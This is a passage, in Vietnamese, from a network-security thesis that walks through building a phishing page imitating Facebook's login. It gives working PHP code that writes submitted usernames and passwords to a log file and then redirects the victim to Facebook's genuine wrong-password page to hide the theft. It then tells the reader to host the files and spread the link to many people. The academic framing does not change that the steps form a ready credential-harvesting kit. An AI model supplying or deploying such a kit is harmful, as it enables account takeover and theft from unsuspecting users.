KỸ THUẬT TẤN CÔNG GIẢ MẠO TRANG WEB (WEB PHISHING)

Một phần của tài liệu Luận văn tốt nghiệp an ninh mạng và bảo mật web (Trang 46)

Phishing là một kỹ thuật hack phổ biến và nguy hiểm để ăn cấp thông tin bí mật của mọi người bằng cách tạo ra các trang đăng nhập giả. Hôm nay mình sẽ cho các bạn và thầy cô thấy làm thế nào để tạo ra được một trang giả mạo đơn giản.

Để thực hiện chúng ta cần tạo ra 3 file sau : 1) facebook.html, 2) mail.php, 3) log.txt

Bước 1:

Mở 1 trang web mà bạn muốn tạo fake login page. Ở đây mình ngái trang facebook.com. Hiện trang được rất nhiều người sử dụng , ta click chuột phải và chọn xem nguồn trang ( View page source )

Hình 3.13: Xem nguồn của website

Còn bây giờ ta hãy xóa toàn bộ nội dung trong “ ” và thay thế đó thành

Hình 3.14: Thay đổi phương thức truyền. Xong rồi ta lưu file trên lại với tên là “facebook.html”

Hình 3.15: Lưu file login.html Vậy là ta làm xong file fake login.html

<?php

header ('Location: https://www.facebook.com/login.php?login_attempt=1'); $handle = fopen("log.txt", "a");

foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>

Hình 3.16: Code trang mail.php

.Khi ai đó click vào chữ đăng nhập trên fake page của bạn thì sẽ được chuyển hướng sang cái link “https://www.facebook.com/login.php?login_attempt=1”... đó là link thông báo sai mật khẩu nhằm đánh lạc hướng victim và bạn có thể chỉnh lại cái link đó tùy theo cách sử dụng của bạn.

Bước 3:

Tạo ra tiếp 1 file nữa là "log.txt" rồi để đó.

Vậy là xong...tiếp theo các bạn upload cả 3 file này nên 1 webhosting nào đó. Sau khi UPLOAD xong link fake page của bạn sẽ có dạng như hình sau :

Hình 3.17: Web hosting giả mạo đã Up lên.

3.3.2Hiện thực

Sau khi đã chuẩn bị xong hết giờ ta bằng một thủ thuật nào đó sẽ link này đến cho nhiều người. Khi họ gõ tài khoản và pass vào đó thì những thông tin đó sẽ được lưu lại ở file log.txt trên host. Mở file log.txt đó lên để xem.

3.4 Hack điểm trong Flash game3.4.1Chuẩn bị

Một phần của tài liệu Luận văn tốt nghiệp an ninh mạng và bảo mật web (Trang 46)

Tải bản đầy đủ (PDF)

(63 trang)